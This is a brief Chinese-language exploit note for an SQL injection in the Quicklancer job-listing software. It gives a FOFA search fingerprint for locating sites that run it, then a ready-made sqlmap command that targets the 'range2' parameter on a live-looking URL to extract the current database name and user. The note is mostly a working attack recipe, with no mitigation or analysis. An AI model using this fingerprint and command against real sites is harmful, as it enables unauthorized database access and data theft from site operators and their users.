Q16-1Quicklancer–SQL
fofa语法:
“service_fragments/css/gig_detail.css”
漏洞复现:
payload:
python sqlmap.py -u "https://quicklancer.bylancer.com/listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1&salary-type=1&sort=id&subcat=" -p range2 --dbms=mysql --current-db --current-user --batch